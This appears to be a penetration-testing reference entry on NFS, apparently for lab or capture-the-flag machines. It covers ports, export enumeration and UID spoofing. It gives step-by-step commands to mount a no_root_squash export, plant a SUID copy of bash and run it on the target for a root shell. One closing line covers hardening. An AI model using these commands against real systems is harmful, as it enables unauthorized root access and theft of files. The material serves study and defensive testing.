NFS
aka Network File System, nfsd
Network File System on 2049. Exports are often world-mountable, and a no_root_squash export lets you plant a root-owned SUID binary that runs as root on the target.
Ports
| Port | Proto | Notes |
|---|---|---|
111 | tcp | rpcbind / portmapper |
2049 | tcp | NFS |
Fingerprint
- showmount -e lists the exported shares
- rpcinfo shows nfs/mountd registered
Key files
| Path | Holds | Sensitive |
|---|---|---|
/etc/exports | export list and options (look for no_root_squash, rw) | sensitive |
Exploitation primitives
- showmount -e then mount the export to read/loot files
- no_root_squash: as local root, drop a SUID-root binary onto the share, then execute it on the target for root
- UID spoofing: create a local user matching the file owner's UID to access restricted files
Overview
NFS on 2049 shares directories over the network. The privesc classic is a no_root_squash export: files you create as root locally keep root ownership on the server, so a SUID binary becomes a root shell.
Enumeration and abuse
List exports:
showmount -e <TARGET>Mount an export:
mkdir /mnt/nfs && mount -t nfs <TARGET>:/export /mnt/nfs -o nolockWith no_root_squash, as local root, drop a SUID bash:
cp /bin/bash /mnt/nfs/rootbash && chmod +s /mnt/nfs/rootbashOn the target, run it:
/export/rootbash -pHardening
Use root_squash, export read-only where possible, and restrict exports to specific hosts.
Seen on these machines 1
